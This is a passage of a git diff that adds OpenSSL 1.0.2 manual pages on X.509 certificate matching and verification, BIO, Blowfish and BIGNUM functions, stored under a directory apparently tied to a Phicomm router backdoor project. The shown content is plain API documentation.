+L<X509_verify_cert(3)|X509_verify_cert(3)>,
+L<X509_check_host(3)|X509_check_host(3)>,
+L<X509_check_email(3)|X509_check_email(3)>,
+L<X509_check_ip(3)|X509_check_ip(3)>
+
+=head1 HISTORY
+
+TBA
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/X509_check_host.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/X509_check_host.pod
new file mode 100644
index 0000000..f8b530d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/X509_check_host.pod
@@ -0,0 +1,137 @@
+=pod
+
+=head1 NAME
+
+X509_check_host, X509_check_email, X509_check_ip, X509_check_ip_asc - X.509 certificate matching
+
+=head1 SYNOPSIS
+
+ #include <openssl/x509.h>
+
+ int X509_check_host(X509 *, const char *name, size_t namelen,
+		     unsigned int flags, char **peername);
+ int X509_check_email(X509 *, const char *address, size_t addresslen,
+		      unsigned int flags);
+ int X509_check_ip(X509 *, const unsigned char *address, size_t addresslen,
+		   unsigned int flags);
+ int X509_check_ip_asc(X509 *, const char *address, unsigned int flags);
+
+=head1 DESCRIPTION
+
+The certificate matching functions are used to check whether a
+certificate matches a given host name, email address, or IP address.
+The validity of the certificate and its trust level has to be checked by
+other means.
+
+X509_check_host() checks if the certificate Subject Alternative
+Name (SAN) or Subject CommonName (CN) matches the specified host
+name, which must be encoded in the preferred name syntax described
+in section 3.5 of RFC 1034.  By default, wildcards are supported
+and they match  only in the left-most label; but they may match
+part of that label with an explicit prefix or suffix.  For example,
+by default, the host B<name> "www.example.com" would match a
+certificate with a SAN or CN value of "*.example.com", "w*.example.com"
+or "*w.example.com".
+
+Per section 6.4.2 of RFC 6125, B<name> values representing international
+domain names must be given in A-label form.  The B<namelen> argument
+must be the number of characters in the name string or zero in which
+case the length is calculated with strlen(B<name>).  When B<name> starts
+with a dot (e.g ".example.com"), it will be matched by a certificate
+valid for any sub-domain of B<name>, (see also
+B<X509_CHECK_FLAG_SINGLE_LABEL_SUBDOMAINS> below).
+
+When the certificate is matched, and B<peername> is not NULL, a
+pointer to a copy of the matching SAN or CN from the peer certificate
+is stored at the address passed in B<peername>.  The application
+is responsible for freeing the peername via OPENSSL_free() when it
+is no longer needed.
+
+X509_check_email() checks if the certificate matches the specified
+email B<address>.  Only the mailbox syntax of RFC 822 is supported,
+comments are not allowed, and no attempt is made to normalize quoted
+characters.  The B<addresslen> argument must be the number of
+characters in the address string or zero in which case the length
+is calculated with strlen(B<address>).
+
+X509_check_ip() checks if the certificate matches a specified IPv4 or
+IPv6 address.  The B<address> array is in binary format, in network
+byte order.  The length is either 4 (IPv4) or 16 (IPv6).  Only
+explicitly marked addresses in the certificates are considered; IP
+addresses stored in DNS names and Common Names are ignored.
+
+X509_check_ip_asc() is similar, except that the NUL-terminated
+string B<address> is first converted to the internal representation.
+
+The B<flags> argument is usually 0.  It can be the bitwise OR of the
+flags:
+
+=over 4
+
+=item B<X509_CHECK_FLAG_ALWAYS_CHECK_SUBJECT>,
+
+=item B<X509_CHECK_FLAG_NO_WILDCARDS>,
+
+=item B<X509_CHECK_FLAG_NO_PARTIAL_WILDCARDS>,
+
+=item B<X509_CHECK_FLAG_MULTI_LABEL_WILDCARDS>.
+
+=item B<X509_CHECK_FLAG_SINGLE_LABEL_SUBDOMAINS>.
+
+=back
+
+The B<X509_CHECK_FLAG_ALWAYS_CHECK_SUBJECT> flag causes the function
+to consider the subject DN even if the certificate contains at least
+one subject alternative name of the right type (DNS name or email
+address as appropriate); the default is to ignore the subject DN
+when at least one corresponding subject alternative names is present.
+
+If set, B<X509_CHECK_FLAG_NO_WILDCARDS> disables wildcard
+expansion; this only applies to B<X509_check_host>.
+
+If set, B<X509_CHECK_FLAG_NO_PARTIAL_WILDCARDS> suppresses support
+for "*" as wildcard pattern in labels that have a prefix or suffix,
+such as: "www*" or "*www"; this only aplies to B<X509_check_host>.
+
+If set, B<X509_CHECK_FLAG_MULTI_LABEL_WILDCARDS> allows a "*" that
+constitutes the complete label of a DNS name (e.g. "*.example.com")
+to match more than one label in B<name>; this flag only applies
+to B<X509_check_host>.
+
+If set, B<X509_CHECK_FLAG_SINGLE_LABEL_SUBDOMAINS> restricts B<name>
+values which start with ".", that would otherwise match any sub-domain
+in the peer certificate, to only match direct child sub-domains.
+Thus, for instance, with this flag set a B<name> of ".example.com"
+would match a peer certificate with a DNS name of "www.example.com",
+but would not match a peer certificate with a DNS name of
+"www.sub.example.com"; this flag only applies to B<X509_check_host>.
+
+=head1 RETURN VALUES
+
+The functions return 1 for a successful match, 0 for a failed match
+and -1 for an internal error: typically a memory allocation failure.
+
+X509_check_ip_asc() can also return -2 if the IP address string is malformed.
+
+=head1 NOTES
+
+Applications are encouraged to use X509_VERIFY_PARAM_set1_host()
+rather than explicitly calling L<X509_check_host(3)>. Host name
+checks are out of scope with the DANE-EE(3) certificate usage,
+and the internal checks will be suppressed as appropriate when
+DANE support is added to OpenSSL.
+
+=head1 SEE ALSO
+
+L<SSL_get_verify_result(3)|SSL_get_verify_result(3)>,
+L<X509_VERIFY_PARAM_set1_host(3)|X509_VERIFY_PARAM_set1_host(3)>,
+L<X509_VERIFY_PARAM_add1_host(3)|X509_VERIFY_PARAM_add1_host(3)>,
+L<X509_VERIFY_PARAM_set1_email(3)|X509_VERIFY_PARAM_set1_email(3)>,
+L<X509_VERIFY_PARAM_set1_ip(3)|X509_VERIFY_PARAM_set1_ip(3)>,
+L<X509_VERIFY_PARAM_set1_ipasc(3)|X509_VERIFY_PARAM_set1_ipasc(3)>
+
+=head1 HISTORY
+
+These functions were added in OpenSSL 1.1.0.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/X509_new.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/X509_new.pod
new file mode 100644
index 0000000..d388723
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/X509_new.pod
@@ -0,0 +1,39 @@
+=pod
+
+=head1 NAME
+
+X509_new, X509_free - X509 certificate ASN1 allocation functions
+
+=head1 SYNOPSIS
+
+ #include <openssl/x509.h>
+
+ X509 *X509_new(void);
+ void X509_free(X509 *a);
+
+=head1 DESCRIPTION
+
+The X509 ASN1 allocation routines, allocate and free an
+X509 structure, which represents an X509 certificate.
+
+X509_new() allocates and initializes a X509 structure.
+
+X509_free() frees up the B<X509> structure B<a>.
+
+=head1 RETURN VALUES
+
+If the allocation fails, X509_new() returns B<NULL> and sets an error
+code that can be obtained by L<ERR_get_error(3)|ERR_get_error(3)>.
+Otherwise it returns a pointer to the newly allocated structure.
+
+X509_free() returns no value.
+
+=head1 SEE ALSO
+
+L<ERR_get_error(3)|ERR_get_error(3)>, L<d2i_X509(3)|d2i_X509(3)>
+
+=head1 HISTORY
+
+X509_new() and X509_free() are available in all versions of SSLeay and OpenSSL.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/X509_verify_cert.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/X509_verify_cert.pod
new file mode 100644
index 0000000..5253bdc
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/X509_verify_cert.pod
@@ -0,0 +1,53 @@
+=pod
+
+=head1 NAME
+
+X509_verify_cert - discover and verify X509 certificte chain
+
+=head1 SYNOPSIS
+
+ #include <openssl/x509.h>
+
+ int X509_verify_cert(X509_STORE_CTX *ctx);
+
+=head1 DESCRIPTION
+
+The X509_verify_cert() function attempts to discover and validate a
+certificate chain based on parameters in B<ctx>. A complete description of
+the process is contained in the L<verify(1)|verify(1)> manual page.
+
+=head1 RETURN VALUES
+
+If a complete chain can be built and validated this function returns 1,
+otherwise it return zero, in exceptional circumstances it can also
+return a negative code.
+
+If the function fails additional error information can be obtained by
+examining B<ctx> using, for example X509_STORE_CTX_get_error().
+
+=head1 NOTES
+
+Applications rarely call this function directly but it is used by
+OpenSSL internally for certificate validation, in both the S/MIME and
+SSL/TLS code.
+
+The negative return value from X509_verify_cert() can only occur if no
+certificate is set in B<ctx> (due to a programming error) or if a retry
+operation is requested during internal lookups (which never happens with
+standard lookup methods). It is however recommended that application check
+for <= 0 return value on error.
+
+=head1 BUGS
+
+This function uses the header B<x509.h> as opposed to most chain verification
+functiosn which use B<x509_vfy.h>.
+
+=head1 SEE ALSO
+
+L<X509_STORE_CTX_get_error(3)|X509_STORE_CTX_get_error(3)>
+
+=head1 HISTORY
+
+X509_verify_cert() is available in all versions of SSLeay and OpenSSL.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/bio.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/bio.pod
new file mode 100644
index 0000000..f923922
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/bio.pod
@@ -0,0 +1,54 @@
+=pod
+
+=head1 NAME
+
+bio - I/O abstraction
+
+=head1 SYNOPSIS
+
+ #include <openssl/bio.h>
+
+TBA
+
+
+=head1 DESCRIPTION
+
+A BIO is an I/O abstraction, it hides many of the underlying I/O
+details from an application. If an application uses a BIO for its
+I/O it can transparently handle SSL connections, unencrypted network
+connections and file I/O.
+
+There are two type of BIO, a source/sink BIO and a filter BIO.
+
+As its name implies a source/sink BIO is a source and/or sink of data,
+examples include a socket BIO and a file BIO.
+
+A filter BIO takes data from one BIO and passes it through to
+another, or the application. The data may be left unmodified (for
+example a message digest BIO) or translated (for example an
+encryption BIO). The effect of a filter BIO may change according
+to the I/O operation it is performing: for example an encryption
+BIO will encrypt data if it is being written to and decrypt data
+if it is being read from.
+
+BIOs can be joined together to form a chain (a single BIO is a chain
+with one component). A chain normally consist of one source/sink
+BIO and one or more filter BIOs. Data read from or written to the
+first BIO then traverses the chain to the end (normally a source/sink
+BIO).
+
+=head1 SEE ALSO
+
+L<BIO_ctrl(3)|BIO_ctrl(3)>,
+L<BIO_f_base64(3)|BIO_f_base64(3)>, L<BIO_f_buffer(3)|BIO_f_buffer(3)>,
+L<BIO_f_cipher(3)|BIO_f_cipher(3)>, L<BIO_f_md(3)|BIO_f_md(3)>,
+L<BIO_f_null(3)|BIO_f_null(3)>, L<BIO_f_ssl(3)|BIO_f_ssl(3)>,
+L<BIO_find_type(3)|BIO_find_type(3)>, L<BIO_new(3)|BIO_new(3)>,
+L<BIO_new_bio_pair(3)|BIO_new_bio_pair(3)>,
+L<BIO_push(3)|BIO_push(3)>, L<BIO_read(3)|BIO_read(3)>,
+L<BIO_s_accept(3)|BIO_s_accept(3)>, L<BIO_s_bio(3)|BIO_s_bio(3)>,
+L<BIO_s_connect(3)|BIO_s_connect(3)>, L<BIO_s_fd(3)|BIO_s_fd(3)>,
+L<BIO_s_file(3)|BIO_s_file(3)>, L<BIO_s_mem(3)|BIO_s_mem(3)>,
+L<BIO_s_null(3)|BIO_s_null(3)>, L<BIO_s_socket(3)|BIO_s_socket(3)>,
+L<BIO_set_callback(3)|BIO_set_callback(3)>,
+L<BIO_should_retry(3)|BIO_should_retry(3)>
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/blowfish.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/blowfish.pod
new file mode 100644
index 0000000..5b2d274
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/blowfish.pod
@@ -0,0 +1,112 @@
+=pod
+
+=head1 NAME
+
+blowfish, BF_set_key, BF_encrypt, BF_decrypt, BF_ecb_encrypt, BF_cbc_encrypt,
+BF_cfb64_encrypt, BF_ofb64_encrypt, BF_options - Blowfish encryption
+
+=head1 SYNOPSIS
+
+ #include <openssl/blowfish.h>
+
+ void BF_set_key(BF_KEY *key, int len, const unsigned char *data);
+
+ void BF_ecb_encrypt(const unsigned char *in, unsigned char *out,
+         BF_KEY *key, int enc);
+ void BF_cbc_encrypt(const unsigned char *in, unsigned char *out,
+ 	 long length, BF_KEY *schedule, unsigned char *ivec, int enc);
+ void BF_cfb64_encrypt(const unsigned char *in, unsigned char *out,
+ 	 long length, BF_KEY *schedule, unsigned char *ivec, int *num,
+         int enc);
+ void BF_ofb64_encrypt(const unsigned char *in, unsigned char *out,
+ 	 long length, BF_KEY *schedule, unsigned char *ivec, int *num);
+ const char *BF_options(void);
+
+ void BF_encrypt(BF_LONG *data,const BF_KEY *key);
+ void BF_decrypt(BF_LONG *data,const BF_KEY *key);
+
+=head1 DESCRIPTION
+
+This library implements the Blowfish cipher, which was invented and described
+by Counterpane (see http://www.counterpane.com/blowfish.html ).
+
+Blowfish is a block cipher that operates on 64 bit (8 byte) blocks of data.
+It uses a variable size key, but typically, 128 bit (16 byte) keys are
+considered good for strong encryption.  Blowfish can be used in the same
+modes as DES (see L<des_modes(7)|des_modes(7)>).  Blowfish is currently one
+of the faster block ciphers.  It is quite a bit faster than DES, and much
+faster than IDEA or RC2.
+
+Blowfish consists of a key setup phase and the actual encryption or decryption
+phase.
+
+BF_set_key() sets up the B<BF_KEY> B<key> using the B<len> bytes long key
+at B<data>.
+
+BF_ecb_encrypt() is the basic Blowfish encryption and decryption function.
+It encrypts or decrypts the first 64 bits of B<in> using the key B<key>,
+putting the result in B<out>.  B<enc> decides if encryption (B<BF_ENCRYPT>)
+or decryption (B<BF_DECRYPT>) shall be performed.  The vector pointed at by
+B<in> and B<out> must be 64 bits in length, no less.  If they are larger,
+everything after the first 64 bits is ignored.
+
+The mode functions BF_cbc_encrypt(), BF_cfb64_encrypt() and BF_ofb64_encrypt()
+all operate on variable length data.  They all take an initialization vector
+B<ivec> which needs to be passed along into the next call of the same function 
+for the same message.  B<ivec> may be initialized with anything, but the
+recipient needs to know what it was initialized with, or it won't be able
+to decrypt.  Some programs and protocols simplify this, like SSH, where
+B<ivec> is simply initialized to zero.
+BF_cbc_encrypt() operates on data that is a multiple of 8 bytes long, while
+BF_cfb64_encrypt() and BF_ofb64_encrypt() are used to encrypt an variable
+number of bytes (the amount does not have to be an exact multiple of 8).  The
+purpose of the latter two is to simulate stream ciphers, and therefore, they
+need the parameter B<num>, which is a pointer to an integer where the current
+offset in B<ivec> is stored between calls.  This integer must be initialized
+to zero when B<ivec> is initialized.
+
+BF_cbc_encrypt() is the Cipher Block Chaining function for Blowfish.  It
+encrypts or decrypts the 64 bits chunks of B<in> using the key B<schedule>,
+putting the result in B<out>.  B<enc> decides if encryption (BF_ENCRYPT) or
+decryption (BF_DECRYPT) shall be performed.  B<ivec> must point at an 8 byte
+long initialization vector.
+
+BF_cfb64_encrypt() is the CFB mode for Blowfish with 64 bit feedback.
+It encrypts or decrypts the bytes in B<in> using the key B<schedule>,
+putting the result in B<out>.  B<enc> decides if encryption (B<BF_ENCRYPT>)
+or decryption (B<BF_DECRYPT>) shall be performed.  B<ivec> must point at an
+8 byte long initialization vector. B<num> must point at an integer which must
+be initially zero.
+
+BF_ofb64_encrypt() is the OFB mode for Blowfish with 64 bit feedback.
+It uses the same parameters as BF_cfb64_encrypt(), which must be initialized
+the same way.
+
+BF_encrypt() and BF_decrypt() are the lowest level functions for Blowfish
+encryption.  They encrypt/decrypt the first 64 bits of the vector pointed by
+B<data>, using the key B<key>.  These functions should not be used unless you
+implement 'modes' of Blowfish.  The alternative is to use BF_ecb_encrypt().
+If you still want to use these functions, you should be aware that they take
+each 32-bit chunk in host-byte order, which is little-endian on little-endian
+platforms and big-endian on big-endian ones.
+
+=head1 RETURN VALUES
+
+None of the functions presented here return any value.
+
+=head1 NOTE
+
+Applications should use the higher level functions
+L<EVP_EncryptInit(3)|EVP_EncryptInit(3)> etc. instead of calling the
+blowfish functions directly.
+
+=head1 SEE ALSO
+
+L<des_modes(7)|des_modes(7)>
+
+=head1 HISTORY
+
+The Blowfish functions are available in all versions of SSLeay and OpenSSL.
+
+=cut
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/bn.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/bn.pod
new file mode 100644
index 0000000..cd2f8e5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/bn.pod
@@ -0,0 +1,181 @@
+=pod
+
+=head1 NAME
+
+bn - multiprecision integer arithmetics
+
+=head1 SYNOPSIS
+
+ #include <openssl/bn.h>
+
+ BIGNUM *BN_new(void);
+ void BN_free(BIGNUM *a);
+ void BN_init(BIGNUM *);
+ void BN_clear(BIGNUM *a);
+ void BN_clear_free(BIGNUM *a);
+
+ BN_CTX *BN_CTX_new(void);
+ void BN_CTX_init(BN_CTX *c);
+ void BN_CTX_free(BN_CTX *c);
+
+ BIGNUM *BN_copy(BIGNUM *a, const BIGNUM *b);
+ BIGNUM *BN_dup(const BIGNUM *a);
+
+ BIGNUM *BN_swap(BIGNUM *a, BIGNUM *b);
+
+ int BN_num_bytes(const BIGNUM *a);
+ int BN_num_bits(const BIGNUM *a);
+ int BN_num_bits_word(BN_ULONG w);
+
+ void BN_set_negative(BIGNUM *a, int n);
+ int  BN_is_negative(const BIGNUM *a);
+
+ int BN_add(BIGNUM *r, const BIGNUM *a, const BIGNUM *b);
+ int BN_sub(BIGNUM *r, const BIGNUM *a, const BIGNUM *b);
+ int BN_mul(BIGNUM *r, BIGNUM *a, BIGNUM *b, BN_CTX *ctx);
+ int BN_sqr(BIGNUM *r, BIGNUM *a, BN_CTX *ctx);
+ int BN_div(BIGNUM *dv, BIGNUM *rem, const BIGNUM *a, const BIGNUM *d,
+         BN_CTX *ctx);
+ int BN_mod(BIGNUM *rem, const BIGNUM *a, const BIGNUM *m, BN_CTX *ctx);
+ int BN_nnmod(BIGNUM *rem, const BIGNUM *a, const BIGNUM *m, BN_CTX *ctx);
+ int BN_mod_add(BIGNUM *ret, BIGNUM *a, BIGNUM *b, const BIGNUM *m,
+         BN_CTX *ctx);
+ int BN_mod_sub(BIGNUM *ret, BIGNUM *a, BIGNUM *b, const BIGNUM *m,
+         BN_CTX *ctx);
+ int BN_mod_mul(BIGNUM *ret, BIGNUM *a, BIGNUM *b, const BIGNUM *m,
+         BN_CTX *ctx);
+ int BN_mod_sqr(BIGNUM *ret, BIGNUM *a, const BIGNUM *m, BN_CTX *ctx);
+ int BN_exp(BIGNUM *r, BIGNUM *a, BIGNUM *p, BN_CTX *ctx);
+ int BN_mod_exp(BIGNUM *r, BIGNUM *a, const BIGNUM *p,
+         const BIGNUM *m, BN_CTX *ctx);
+ int BN_gcd(BIGNUM *r, BIGNUM *a, BIGNUM *b, BN_CTX *ctx);
+
+ int BN_add_word(BIGNUM *a, BN_ULONG w);
+ int BN_sub_word(BIGNUM *a, BN_ULONG w);
+ int BN_mul_word(BIGNUM *a, BN_ULONG w);
+ BN_ULONG BN_div_word(BIGNUM *a, BN_ULONG w);
+ BN_ULONG BN_mod_word(const BIGNUM *a, BN_ULONG w);
+
+ int BN_cmp(BIGNUM *a, BIGNUM *b);
+ int BN_ucmp(BIGNUM *a, BIGNUM *b);
+ int BN_is_zero(BIGNUM *a);
+ int BN_is_one(BIGNUM *a);
+ int BN_is_word(BIGNUM *a, BN_ULONG w);
+ int BN_is_odd(BIGNUM *a);
+
+ int BN_zero(BIGNUM *a);
+ int BN_one(BIGNUM *a);
+ const BIGNUM *BN_value_one(void);
+ int BN_set_word(BIGNUM *a, unsigned long w);
+ unsigned long BN_get_word(BIGNUM *a);
+
+ int BN_rand(BIGNUM *rnd, int bits, int top, int bottom);
+ int BN_pseudo_rand(BIGNUM *rnd, int bits, int top, int bottom);
+ int BN_rand_range(BIGNUM *rnd, BIGNUM *range);
+ int BN_pseudo_rand_range(BIGNUM *rnd, BIGNUM *range);
+
+ BIGNUM *BN_generate_prime(BIGNUM *ret, int bits,int safe, BIGNUM *add,
+         BIGNUM *rem, void (*callback)(int, int, void *), void *cb_arg);
+ int BN_is_prime(const BIGNUM *p, int nchecks,
+         void (*callback)(int, int, void *), BN_CTX *ctx, void *cb_arg);
+
+ int BN_set_bit(BIGNUM *a, int n);
+ int BN_clear_bit(BIGNUM *a, int n);
+ int BN_is_bit_set(const BIGNUM *a, int n);
+ int BN_mask_bits(BIGNUM *a, int n);
+ int BN_lshift(BIGNUM *r, const BIGNUM *a, int n);
+ int BN_lshift1(BIGNUM *r, BIGNUM *a);
+ int BN_rshift(BIGNUM *r, BIGNUM *a, int n);
+ int BN_rshift1(BIGNUM *r, BIGNUM *a);
+
+ int BN_bn2bin(const BIGNUM *a, unsigned char *to);
+ BIGNUM *BN_bin2bn(const unsigned char *s, int len, BIGNUM *ret);
+ char *BN_bn2hex(const BIGNUM *a);
+ char *BN_bn2dec(const BIGNUM *a);
+ int BN_hex2bn(BIGNUM **a, const char *str);
+ int BN_dec2bn(BIGNUM **a, const char *str);
+ int BN_print(BIO *fp, const BIGNUM *a);
+ int BN_print_fp(FILE *fp, const BIGNUM *a);
+ int BN_bn2mpi(const BIGNUM *a, unsigned char *to);
+ BIGNUM *BN_mpi2bn(unsigned char *s, int len, BIGNUM *ret);
+
+ BIGNUM *BN_mod_inverse(BIGNUM *r, BIGNUM *a, const BIGNUM *n,
+     BN_CTX *ctx);
+
+ BN_RECP_CTX *BN_RECP_CTX_new(void);
+ void BN_RECP_CTX_init(BN_RECP_CTX *recp);
+ void BN_RECP_CTX_free(BN_RECP_CTX *recp);
+ int BN_RECP_CTX_set(BN_RECP_CTX *recp, const BIGNUM *m, BN_CTX *ctx);
+ int BN_mod_mul_reciprocal(BIGNUM *r, BIGNUM *a, BIGNUM *b,
+        BN_RECP_CTX *recp, BN_CTX *ctx);
+
+ BN_MONT_CTX *BN_MONT_CTX_new(void);
+ void BN_MONT_CTX_init(BN_MONT_CTX *ctx);
+ void BN_MONT_CTX_free(BN_MONT_CTX *mont);
+ int BN_MONT_CTX_set(BN_MONT_CTX *mont, const BIGNUM *m, BN_CTX *ctx);
+ BN_MONT_CTX *BN_MONT_CTX_copy(BN_MONT_CTX *to, BN_MONT_CTX *from);
+ int BN_mod_mul_montgomery(BIGNUM *r, BIGNUM *a, BIGNUM *b,
+         BN_MONT_CTX *mont, BN_CTX *ctx);
+ int BN_from_montgomery(BIGNUM *r, BIGNUM *a, BN_MONT_CTX *mont,
+         BN_CTX *ctx);
+ int BN_to_montgomery(BIGNUM *r, BIGNUM *a, BN_MONT_CTX *mont,
+         BN_CTX *ctx);
+
+ BN_BLINDING *BN_BLINDING_new(const BIGNUM *A, const BIGNUM *Ai,
+	BIGNUM *mod);
+ void BN_BLINDING_free(BN_BLINDING *b);
+ int BN_BLINDING_update(BN_BLINDING *b,BN_CTX *ctx);
+ int BN_BLINDING_convert(BIGNUM *n, BN_BLINDING *b, BN_CTX *ctx);
+ int BN_BLINDING_invert(BIGNUM *n, BN_BLINDING *b, BN_CTX *ctx);
+ int BN_BLINDING_convert_ex(BIGNUM *n, BIGNUM *r, BN_BLINDING *b,
+	BN_CTX *ctx);
+ int BN_BLINDING_invert_ex(BIGNUM *n,const BIGNUM *r,BN_BLINDING *b,
+	BN_CTX *ctx);
+ unsigned long BN_BLINDING_get_thread_id(const BN_BLINDING *);
+ void BN_BLINDING_set_thread_id(BN_BLINDING *, unsigned long);
+ unsigned long BN_BLINDING_get_flags(const BN_BLINDING *);
+ void BN_BLINDING_set_flags(BN_BLINDING *, unsigned long);
+ BN_BLINDING *BN_BLINDING_create_param(BN_BLINDING *b,
+	const BIGNUM *e, BIGNUM *m, BN_CTX *ctx,
+	int (*bn_mod_exp)(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
+			  const BIGNUM *m, BN_CTX *ctx, BN_MONT_CTX *m_ctx),
+	BN_MONT_CTX *m_ctx);
+
+=head1 DESCRIPTION
+
+This library performs arithmetic operations on integers of arbitrary
+size. It was written for use in public key cryptography, such as RSA
+and Diffie-Hellman.
+
+It uses dynamic memory allocation for storing its data structures.
+That means that there is no limit on the size of the numbers
+manipulated by these functions, but return values must always be
+checked in case a memory allocation error has occurred.
+
+The basic object in this library is a B<BIGNUM>. It is used to hold a
+single large integer. This type should be considered opaque and fields
+should not be modified or accessed directly.
+
+The creation of B<BIGNUM> objects is described in L<BN_new(3)|BN_new(3)>;
+L<BN_add(3)|BN_add(3)> describes most of the arithmetic operations.
+Comparison is described in L<BN_cmp(3)|BN_cmp(3)>; L<BN_zero(3)|BN_zero(3)>
+describes certain assignments, L<BN_rand(3)|BN_rand(3)> the generation of
+random numbers, L<BN_generate_prime(3)|BN_generate_prime(3)> deals with prime
+numbers and L<BN_set_bit(3)|BN_set_bit(3)> with bit operations. The conversion
+of B<BIGNUM>s to external formats is described in L<BN_bn2bin(3)|BN_bn2bin(3)>.
+
+=head1 SEE ALSO
+
+L<bn_internal(3)|bn_internal(3)>,
+L<dh(3)|dh(3)>, L<err(3)|err(3)>, L<rand(3)|rand(3)>, L<rsa(3)|rsa(3)>,
+L<BN_new(3)|BN_new(3)>, L<BN_CTX_new(3)|BN_CTX_new(3)>,
+L<BN_copy(3)|BN_copy(3)>, L<BN_swap(3)|BN_swap(3)>, L<BN_num_bytes(3)|BN_num_bytes(3)>,
+L<BN_add(3)|BN_add(3)>, L<BN_add_word(3)|BN_add_word(3)>,
+L<BN_cmp(3)|BN_cmp(3)>, L<BN_zero(3)|BN_zero(3)>, L<BN_rand(3)|BN_rand(3)>,
+L<BN_generate_prime(3)|BN_generate_prime(3)>, L<BN_set_bit(3)|BN_set_bit(3)>,
+L<BN_bn2bin(3)|BN_bn2bin(3)>, L<BN_mod_inverse(3)|BN_mod_inverse(3)>,
+L<BN_mod_mul_reciprocal(3)|BN_mod_mul_reciprocal(3)>,
+L<BN_mod_mul_montgomery(3)|BN_mod_mul_montgomery(3)>,
+L<BN_BLINDING_new(3)|BN_BLINDING_new(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/bn_internal.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/bn_internal.pod
new file mode 100644
index 0000000..91840b0
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/bn_internal.pod
@@ -0,0 +1,238 @@
+=pod
+
+=head1 NAME
+
+bn_mul_words, bn_mul_add_words, bn_sqr_words, bn_div_words,
+bn_add_words, bn_sub_words, bn_mul_comba4, bn_mul_comba8,
+bn_sqr_comba4, bn_sqr_comba8, bn_cmp_words, bn_mul_normal,
+bn_mul_low_normal, bn_mul_recursive, bn_mul_part_recursive,
+bn_mul_low_recursive, bn_mul_high, bn_sqr_normal, bn_sqr_recursive,
+bn_expand, bn_wexpand, bn_expand2, bn_fix_top, bn_check_top,
+bn_print, bn_dump, bn_set_max, bn_set_high, bn_set_low - BIGNUM
+library internal functions
+
+=head1 SYNOPSIS
+
+ #include <openssl/bn.h>
+
+ BN_ULONG bn_mul_words(BN_ULONG *rp, BN_ULONG *ap, int num, BN_ULONG w);
+ BN_ULONG bn_mul_add_words(BN_ULONG *rp, BN_ULONG *ap, int num,
+   BN_ULONG w);
+ void     bn_sqr_words(BN_ULONG *rp, BN_ULONG *ap, int num);
+ BN_ULONG bn_div_words(BN_ULONG h, BN_ULONG l, BN_ULONG d);
+ BN_ULONG bn_add_words(BN_ULONG *rp, BN_ULONG *ap, BN_ULONG *bp,
+   int num);
+ BN_ULONG bn_sub_words(BN_ULONG *rp, BN_ULONG *ap, BN_ULONG *bp,
+   int num);
+
+ void bn_mul_comba4(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b);
+ void bn_mul_comba8(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b);
+ void bn_sqr_comba4(BN_ULONG *r, BN_ULONG *a);
+ void bn_sqr_comba8(BN_ULONG *r, BN_ULONG *a);
+
+ int bn_cmp_words(BN_ULONG *a, BN_ULONG *b, int n);
+
+ void bn_mul_normal(BN_ULONG *r, BN_ULONG *a, int na, BN_ULONG *b,
+   int nb);
+ void bn_mul_low_normal(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b, int n);
+ void bn_mul_recursive(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b, int n2,
+   int dna,int dnb,BN_ULONG *tmp);
+ void bn_mul_part_recursive(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b,
+   int n, int tna,int tnb, BN_ULONG *tmp);
+ void bn_mul_low_recursive(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b,
+   int n2, BN_ULONG *tmp);
+ void bn_mul_high(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b, BN_ULONG *l,
+   int n2, BN_ULONG *tmp);
+
+ void bn_sqr_normal(BN_ULONG *r, BN_ULONG *a, int n, BN_ULONG *tmp);
+ void bn_sqr_recursive(BN_ULONG *r, BN_ULONG *a, int n2, BN_ULONG *tmp);
+
+ void mul(BN_ULONG r, BN_ULONG a, BN_ULONG w, BN_ULONG c);
+ void mul_add(BN_ULONG r, BN_ULONG a, BN_ULONG w, BN_ULONG c);
+ void sqr(BN_ULONG r0, BN_ULONG r1, BN_ULONG a);
+
+ BIGNUM *bn_expand(BIGNUM *a, int bits);
+ BIGNUM *bn_wexpand(BIGNUM *a, int n);
+ BIGNUM *bn_expand2(BIGNUM *a, int n);
+ void bn_fix_top(BIGNUM *a);
+
+ void bn_check_top(BIGNUM *a);
+ void bn_print(BIGNUM *a);
